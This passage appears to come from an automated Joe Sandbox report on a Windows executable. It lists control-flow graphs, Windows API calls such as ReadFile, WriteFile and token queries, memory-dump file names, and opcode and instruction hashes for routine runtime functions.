                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19214F61F1E64291FA71FB31E8553B6B290BF88394FC041BEE65D825D5EE2CE509C720

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 744 7ff79a32bacc-7ff79a32baf2 745 7ff79a32bb0d-7ff79a32bb11 744->745 746 7ff79a32baf4-7ff79a32bb08 call 7ff79a324f58 call 7ff79a324f78 744->746 748 7ff79a32bee7-7ff79a32bef3 call 7ff79a324f58 call 7ff79a324f78 745->748 749 7ff79a32bb17-7ff79a32bb1e 745->749 764 7ff79a32befe 746->764 766 7ff79a32bef9 call 7ff79a32a950 748->766 749->748 751 7ff79a32bb24-7ff79a32bb52 749->751 751->748 754 7ff79a32bb58-7ff79a32bb5f 751->754 758 7ff79a32bb78-7ff79a32bb7b 754->758 759 7ff79a32bb61-7ff79a32bb73 call 7ff79a324f58 call 7ff79a324f78 754->759 762 7ff79a32bb81-7ff79a32bb87 758->762 763 7ff79a32bee3-7ff79a32bee5 758->763 759->766 762->763 768 7ff79a32bb8d-7ff79a32bb90 762->768 767 7ff79a32bf01-7ff79a32bf18 763->767 764->767 766->764 768->759 771 7ff79a32bb92-7ff79a32bbb7 768->771 773 7ff79a32bbb9-7ff79a32bbbb 771->773 774 7ff79a32bbea-7ff79a32bbf1 771->774 777 7ff79a32bbbd-7ff79a32bbc4 773->777 778 7ff79a32bbe2-7ff79a32bbe8 773->778 775 7ff79a32bbc6-7ff79a32bbdd call 7ff79a324f58 call 7ff79a324f78 call 7ff79a32a950 774->775 776 7ff79a32bbf3-7ff79a32bc1b call 7ff79a32d66c call 7ff79a32a9b8 * 2 774->776 805 7ff79a32bd70 775->805 807 7ff79a32bc38-7ff79a32bc63 call 7ff79a32c2f4 776->807 808 7ff79a32bc1d-7ff79a32bc33 call 7ff79a324f78 call 7ff79a324f58 776->808 777->775 777->778 779 7ff79a32bc68-7ff79a32bc7f 778->779 782 7ff79a32bcfa-7ff79a32bd04 call 7ff79a33398c 779->782 783 7ff79a32bc81-7ff79a32bc89 779->783 796 7ff79a32bd0a-7ff79a32bd1f 782->796 797 7ff79a32bd8e 782->797 783->782 786 7ff79a32bc8b-7ff79a32bc8d 783->786 786->782 790 7ff79a32bc8f-7ff79a32bca5 786->790 790->782 794 7ff79a32bca7-7ff79a32bcb3 790->794 794->782 801 7ff79a32bcb5-7ff79a32bcb7 794->801 796->797 799 7ff79a32bd21-7ff79a32bd33 GetConsoleMode 796->799 803 7ff79a32bd93-7ff79a32bdb3 ReadFile 797->803 799->797 804 7ff79a32bd35-7ff79a32bd3d 799->804 801->782 806 7ff79a32bcb9-7ff79a32bcd1 801->806 809 7ff79a32bdb9-7ff79a32bdc1 803->809 810 7ff79a32bead-7ff79a32beb6 GetLastError 803->810 804->803 812 7ff79a32bd3f-7ff79a32bd61 ReadConsoleW 804->812 815 7ff79a32bd73-7ff79a32bd7d call 7ff79a32a9b8 805->815 806->782 816 7ff79a32bcd3-7ff79a32bcdf 806->816 807->779 808->805 809->810 818 7ff79a32bdc7 809->818 813 7ff79a32beb8-7ff79a32bece call 7ff79a324f78 call 7ff79a324f58 810->813 814 7ff79a32bed3-7ff79a32bed6 810->814 820 7ff79a32bd82-7ff79a32bd8c 812->820 821 7ff79a32bd63 GetLastError 812->821 813->805 825 7ff79a32bd69-7ff79a32bd6b call 7ff79a324eec 814->825 826 7ff79a32bedc-7ff79a32bede 814->826 815->767 816->782 824 7ff79a32bce1-7ff79a32bce3 816->824 828 7ff79a32bdce-7ff79a32bde3 818->828 820->828 821->825 824->782 833 7ff79a32bce5-7ff79a32bcf5 824->833 825->805 826->815 828->815 829 7ff79a32bde5-7ff79a32bdf0 828->829 835 7ff79a32be17-7ff79a32be1f 829->835 836 7ff79a32bdf2-7ff79a32be0b call 7ff79a32b6e4 829->836 833->782 840 7ff79a32be9b-7ff79a32bea8 call 7ff79a32b524 835->840 841 7ff79a32be21-7ff79a32be33 835->841 844 7ff79a32be10-7ff79a32be12 836->844 840->844 845 7ff79a32be8e-7ff79a32be96 841->845 846 7ff79a32be35 841->846 844->815 845->815 848 7ff79a32be3a-7ff79a32be41 846->848 849 7ff79a32be7d-7ff79a32be88 848->849 850 7ff79a32be43-7ff79a32be47 848->850 849->845 851 7ff79a32be49-7ff79a32be50 850->851 852 7ff79a32be63 850->852 851->852 853 7ff79a32be52-7ff79a32be56 851->853 854 7ff79a32be69-7ff79a32be79 852->854 853->852 855 7ff79a32be58-7ff79a32be61 853->855 854->848 856 7ff79a32be7b 854->856 855->854 856->845
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                              • Instruction ID: 11b114a80602d514dd58e9dceae7d7d1c247fc3b977190388b0f37f93051e6a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99C1C32290E78692F770AF3594482BDB764EB81B80FD541BDEE4E077A5CE7CE8458720

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                              • Instruction ID: dd8c85cd44562e659655ac29c99e1bc5d5451cfb855f5b8be24bd74d21e16da3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8215E31E0D64242FB20AB75F49422AF7A1FB857A0F90427DEAAD43AE8DF6CD4448710

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: GetCurrentProcess.KERNEL32 ref: 00007FF79A318780
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: OpenProcessToken.ADVAPI32 ref: 00007FF79A318793
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: GetTokenInformation.KERNELBASE ref: 00007FF79A3187B8
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: GetLastError.KERNEL32 ref: 00007FF79A3187C2
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: GetTokenInformation.KERNELBASE ref: 00007FF79A318802
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79A31881E
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318760: CloseHandle.KERNEL32 ref: 00007FF79A318836
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF79A313C55), ref: 00007FF79A31916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF79A313C55), ref: 00007FF79A319175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                              • Instruction ID: 20e327d6d17f214a5e18aba345cb5dd2f49317a5bb8afa184f016e94d62aa5ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E214B21A0E74282F660FB31E9152EAB3A4EF88780FC444BDEA4D53796DF3CD8458760

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 963 7ff79a32cfd0-7ff79a32cff5 964 7ff79a32cffb-7ff79a32cffe 963->964 965 7ff79a32d2c3 963->965 967 7ff79a32d037-7ff79a32d063 964->967 968 7ff79a32d000-7ff79a32d032 call 7ff79a32a884 964->968 966 7ff79a32d2c5-7ff79a32d2d5 965->966 969 7ff79a32d06e-7ff79a32d074 967->969 970 7ff79a32d065-7ff79a32d06c 967->970 968->966 972 7ff79a32d076-7ff79a32d07f call 7ff79a32c390 969->972 973 7ff79a32d084-7ff79a32d099 call 7ff79a33398c 969->973 970->968 970->969 972->973 978 7ff79a32d09f-7ff79a32d0a8 973->978 979 7ff79a32d1b3-7ff79a32d1bc 973->979 978->979 982 7ff79a32d0ae-7ff79a32d0b2 978->982 980 7ff79a32d1be-7ff79a32d1c4 979->980 981 7ff79a32d210-7ff79a32d235 WriteFile 979->981 985 7ff79a32d1fc-7ff79a32d20e call 7ff79a32ca88 980->985 986 7ff79a32d1c6-7ff79a32d1c9 980->986 983 7ff79a32d237-7ff79a32d23d GetLastError 981->983 984 7ff79a32d240 981->984 987 7ff79a32d0c3-7ff79a32d0ce 982->987 988 7ff79a32d0b4-7ff79a32d0bc call 7ff79a324830 982->988 983->984 989 7ff79a32d243 984->989 1006 7ff79a32d1a0-7ff79a32d1a7 985->1006 990 7ff79a32d1e8-7ff79a32d1fa call 7ff79a32cca8 986->990 991 7ff79a32d1cb-7ff79a32d1ce 986->991 993 7ff79a32d0df-7ff79a32d0f4 GetConsoleMode 987->993 994 7ff79a32d0d0-7ff79a32d0d9 987->994 988->987 997 7ff79a32d248 989->997 990->1006 998 7ff79a32d254-7ff79a32d25e 991->998 999 7ff79a32d1d4-7ff79a32d1e6 call 7ff79a32cb8c 991->999 1002 7ff79a32d0fa-7ff79a32d100 993->1002 1003 7ff79a32d1ac 993->1003 994->979 994->993 1007 7ff79a32d24d 997->1007 1008 7ff79a32d2bc-7ff79a32d2c1 998->1008 1009 7ff79a32d260-7ff79a32d265 998->1009 999->1006 1004 7ff79a32d189-7ff79a32d19b call 7ff79a32c610 1002->1004 1005 7ff79a32d106-7ff79a32d109 1002->1005 1003->979 1004->1006 1013 7ff79a32d10b-7ff79a32d10e 1005->1013 1014 7ff79a32d114-7ff79a32d122 1005->1014 1006->997 1007->998 1008->966 1015 7ff79a32d267-7ff79a32d26a 1009->1015 1016 7ff79a32d293-7ff79a32d29d 1009->1016 1013->1007 1013->1014 1020 7ff79a32d180-7ff79a32d184 1014->1020 1021 7ff79a32d124 1014->1021 1022 7ff79a32d26c-7ff79a32d27b 1015->1022 1023 7ff79a32d283-7ff79a32d28e call 7ff79a324f34 1015->1023 1018 7ff79a32d29f-7ff79a32d2a2 1016->1018 1019 7ff79a32d2a4-7ff79a32d2b3 1016->1019 1018->965 1018->1019 1019->1008 1020->989 1024 7ff79a32d128-7ff79a32d13f call 7ff79a333a58 1021->1024 1022->1023 1023->1016 1029 7ff79a32d177-7ff79a32d17d GetLastError 1024->1029 1030 7ff79a32d141-7ff79a32d14d 1024->1030 1029->1020 1031 7ff79a32d16c-7ff79a32d173 1030->1031 1032 7ff79a32d14f-7ff79a32d161 call 7ff79a333a58 1030->1032 1031->1020 1034 7ff79a32d175 1031->1034 1032->1029 1036 7ff79a32d163-7ff79a32d16a 1032->1036 1034->1024 1036->1031
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A32CFBB), ref: 00007FF79A32D0EC
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A32CFBB), ref: 00007FF79A32D177
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction ID: 6995a6c4d7836f3c3ade9fecc8060f629bbd5eb12901d578d04cdac9b6905bf3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B091B322E1A65189F7B0AF7594402BDBBA0FB44BC8F94417DDE4E57A95CF38E442C720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction ID: 99208a7bd62d03fe223c48bba9b6c9d1b163a6a2775e67259bef1c964edd8153
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2541A122D1978283F360AB319654379B260FB947A4F50937DEA9C03ED6DF7CA5E08760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction ID: b07bad99604f84b8c779a92eeb66fd4874df6644f4aadefcc57f7713f9911625
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4311721E0E24256FA74FB7594A23B9B791AF42384FC408BDE94E472D7DE2CA815C271
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                              • Instruction ID: 08fbc2ff85ad6a70034286207cca278b386162a0b937e02e454389af550659a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7ED06C10F0A74A42FA283F745899078B251AF48B42BD414BCED0B46393ED6DA8498320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                              • Instruction ID: d8b417cf92a97ddbce5fa69e19d74c33bcd8ac60ee2922ea736eb7179b7db9aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D51E661B0B24296F738BE36940067AF291AF46BA4F94477DEE6C437C5CF3CE9058620
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction ID: 82133781b8d66feb67c9cea04e4113c02db0436d525814eb16ac41e1d313143c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA110161A09B8181EA20AB35B814069F361BB81BF0F94437DEE7D4B7E8CF3CE0018700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction ID: aca873f911cabe20a60e08cdb733db224169bb6a783f222007ff70efc026313b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0E08610F1F60653FF347BB2A855138B150AF84740FC540BDDC1D822A1DE2C68858330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF79A32AA45,?,?,00000000,00007FF79A32AAFA), ref: 00007FF79A32AC36
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF79A32AA45,?,?,00000000,00007FF79A32AAFA), ref: 00007FF79A32AC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
